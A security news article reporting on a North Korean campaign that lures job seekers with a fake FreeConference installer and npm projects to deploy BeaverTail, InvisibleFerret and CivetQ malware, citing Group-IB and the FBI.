North Korean Cybercriminals Aim Job Seekers with Bogus FreeConference App
A group of hackers from North Korea has exploited a counterfeit Windows video conferencing application posing as FreeConference.com to infect developer systems as part of an ongoing financially-motivated operation dubbed Contagious Interview.
The latest series of attacks, discovered by the Singaporean firm Group-IB in mid-August 2024, serves as another proof that the threat actors are utilizing genuine installers for Windows and Apple macOS to disseminate malware.
Contagious Interview, also known as DEV#POPPER, is a malicious campaign orchestrated by a North Korean threat group identified by CrowdStrike as Famous Chollima.
The attack operation commences with a fictional job interview, deceiving job applicants into downloading and executing a Node.js project containing the BeaverTail downloader malware. Subsequently, this leads to the deployment of a cross-platform Python backdoor named InvisibleFerret, offering capabilities such as remote control, keylogging, and theft of browser data.
Some versions of BeaverTail, which doubles up as an information-stealing tool, have materialized in the shape of JavaScript malware distributed via fictitious npm packages under the guise of a technical evaluation during the job interview process.
However, there was a shift in July 2024 when Windows MSI installer and Apple macOS disk image (DMG) files disguising themselves as the legitimate MiroTalk video conferencing software were identified in the wild as a means to deploy an updated version of BeaverTail.
The latest insights from Group-IB, crediting the campaign to the infamous Lazarus Group, indicate that the threat group is persisting with this particular distribution channel, only altering the installer (“FCCCall.msi”) to mimic FreeConference.com instead of MiroTalk.
It is suspected that the fake installer is fetched from a site named freeconference[.]io, sharing the same registrar as the fictitious mirotalk[.]net web domain.
“Apart from Linkedin, Lazarus is actively scouting for potential victims on other job hunting platforms like WWR, Moonlight, Upwork, and similar sites,” remarked security analyst Sharmine Low.
“Once initial contact is made, they frequently urge to shift the conversation onto Telegram, where they request the potential candidates to download a video conferencing application or a Node.js project to perform a technical assignment as part of the interview process.”
In a telling sign that the campaign is being refined actively, the hackers have been observed embedding the malicious JavaScript into repositories related to both cryptocurrency and gaming, with the JavaScript code engineered to fetch the BeaverTail Javascript code from the domains ipcheck[.]cloud or regioncheck[.]net.
It’s important to note that this pattern was also recently highlighted by cybersecurity firm Phylum concerning an npm package named helmet-validate, indicating that the threat actors are utilizing distinct pathways for distribution simultaneously.
Another significant development is that BeaverTail is now set up to extract data from additional cryptocurrency wallet extensions such as Kaikas, Rabby, Argent X, and Exodus Web3, alongside integrating functionalities to establish persistence using AnyDesk.
Furthermore, the information-stealing attributes of BeaverTail are now realized through a series of Python scripts known as CivetQ, designed to capture cookies, web browser information, keystrokes, clipboard content, and dispense additional scripts. The malware targets a total of 74 browser extensions.
“Through coordination with the application’s SQLite database files situated at `%LocalAppData%PackagesMicrosoft.MicrosoftStickyNotes_8wekyb3d8bbweLocalStateplum.sqlite,` where user notes are kept in plain text format, the malware can extract data from Microsoft Sticky Notes,” revealed Low.
“By fetching and extracting data from this database, the malware can access and leak sensitive information stored in the victim’s Sticky Notes application.”
The debut of CivetQ indicates a modular approach, affirming that the tools are evolving consistently in small steps over the recent months.
“Lazarus has revamped their strategies, enhanced their tools, and identified better methods to mask their actions,” mentioned Low. “They indicate no signs of slowing down, with their operation targeting job seekers stretching into 2024 and beyond. Their attacks have grown more inventive, expanding their influence across multiple platforms.”
This revelation coincides with a warning from the U.S. Federal Bureau of Investigation (FBI) cautioning about North Korean cyber actors’ intense focus on the cryptocurrency sector through “well-disguised” social engineering ploys to ease cryptocurrency theft.
“North Korean social engineering tactics are intricate and elaborate, often targeting victims possessing advanced technical knowledge,” stated the FBI in a notice released recently, noting that the threat actors single out potential victims by scrutinizing their activities on professional networking or employment-oriented platforms.
“Groups of North Korean malicious cyber actors identify particular DeFi or cryptocurrency-oriented businesses to target and endeavor to socially engineer numerous employees from these companies to secure unauthorized access to the firm’s network.”
About Author
